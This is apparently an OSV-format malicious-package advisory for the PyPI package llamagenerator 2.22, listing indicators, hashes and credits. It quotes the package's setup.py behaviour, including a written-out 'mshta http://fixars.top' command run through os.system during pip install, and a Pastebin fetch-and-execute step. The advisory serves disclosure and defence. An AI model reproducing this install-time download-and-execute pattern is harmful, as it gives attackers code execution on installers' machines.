{"id":"MAL-2026-5771","summary":"Malicious code in llamagenerator (PyPI)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (2e72d70dd6ee72468c56f2a334414bd1fa8f5ad1e70fea0d89c08f7d1c8ca557)\nThe package's setup.py fetches the raw contents of https://pastebin.com/raw/yBcUM1QB during pip install, takes the first line, and passes it directly to os.system('cmd /c \"...\"'). If the Pastebin fetch fails, it falls back to os.system('cmd /c \"mshta http://fixars.top\"'), invoking the Windows mshta living-off-the-land binary to download and execute an HTA script from an attacker-controlled domain over plaintext HTTP. Both branches grant the publisher arbitrary code execution on the installer's machine on `pip install`. The package has no legitimate functionality: PKG-INFO has placeholder metadata (Name/Author/Summary all set to 'LLamaGenerator', no description, no URL), and the src/ tree is empty aside from egg-info. The LLM-themed name appears to be a lure trading on the Llama ecosystem.\n\n## Source: kam193 (f3bd291e16e0208c59f8b5c9cb8844b6b4557bdfe204eb3e7253bad507f5685d)\nDuring installation, the code attempts to download and start a malicious executable.\n\nLikely related to 2025-08-raknet-testing-package.\n\n\n---\n\nCategory: MALICIOUS - The campaign has clearly malicious intent, like infostealers.\n\n\nCampaign: 2026-06-easyaillm\n\n\nReasons (based on the campaign):\n\n\n - Downloads and executes a remote executable.\n\n\n - obfuscation\n\n\n - malware\n","modified":"2026-06-15T20:31:53.272554781Z","published":"2026-06-14T12:50:38Z","database_specific":{"iocs":{"domains":["fixars.top"],"urls":["https://pastebin.com/raw/hEF5HaFc","https://pastebin.com/raw/yBcUM1QBs","https://pastebin.com/raw/yBcUM1QB","http://fixars.top"]},"malicious-packages-origins":[{"id":"pypi/2026-06-easyaillm/llamagenerator","modified_time":"2026-06-14T12:50:38.980941Z","import_time":"2026-06-14T13:36:53.095817636Z","sha256":"f3bd291e16e0208c59f8b5c9cb8844b6b4557bdfe204eb3e7253bad507f5685d","source":"kam193","versions":["2.22"]},{"source":"amazon-inspector","modified_time":"2026-06-15T19:56:20Z","import_time":"2026-06-15T20:14:28.691332297Z","sha256":"2e72d70dd6ee72468c56f2a334414bd1fa8f5ad1e70fea0d89c08f7d1c8ca557","id":"IN-MAL-2026-006695","versions":["2.22"]}]},"references":[{"type":"EVIDENCE","url":"https://www.virustotal.com/gui/file/1a5beab4a6facb46b4afc5f8526e1327e6c7d740ccaf34c6a921ac18eff29427/detection"},{"type":"EVIDENCE","url":"https://www.virustotal.com/gui/file/4c99c8edfc4444f46932f14afccb2952a3850df765765f9ac793d69f318c192f/detection"},{"type":"EVIDENCE","url":"https://www.virustotal.com/gui/file/0649f50ead3695f41c1243883200bdb775410bcd8c8fb88277740a625a154e25"},{"type":"WEB","url":"https://bad-packages.kam193.eu/pypi/package/llamagenerator"},{"type":"PACKAGE","url":"https://pypi.org/project/LLamaGenerator/2.22/"}],"affected":[{"package":{"name":"llamagenerator","ecosystem":"PyPI","purl":"pkg:pypi/llamagenerator"},"versions":["2.22"],"database_specific":{"indicators":{"package_integrity":[{"filename":"llamagenerator-2.22.tar.gz","hashes":{"blake2b_256":"479263e9542ae078d1a9cbad8cc39eb7202e12dc66d2c642af81b9c0188a0d73","md5":"d4fe7617995bcedd024b56d05b6e049e","sha256":"9dde9422ef1d6b09dc4213be72484089b6c56f3b421d60747dcf69a63c6f307a"}}],"evidence_files":[{"path":"setup.py","sha256":"a17064062a8b565138985cac84982eb68e33a2d22f0ae4e5320d19fcb15dde69","tlsh":"ba116513dd877ca762f140441d316860f96296ab2761c8dbb87c835d7fb06a18972cac"},{"path":"PKG-INFO","sha256":"f3e5275520fba3a919b630da4caf4cf72c56be72c12421967726a9af6f7e73a6","tlsh":"13e0d81423cadcf276a70a48590463339225829088c91419f4ea0bc6b29559953fd838"}]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/llamagenerator/MAL-2026-5771.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},{"name":"Kamil Mańkowski (kam193)","contact":["https://github.com/kam193","https://bad-packages.kam193.eu/"],"type":"REPORTER"}]}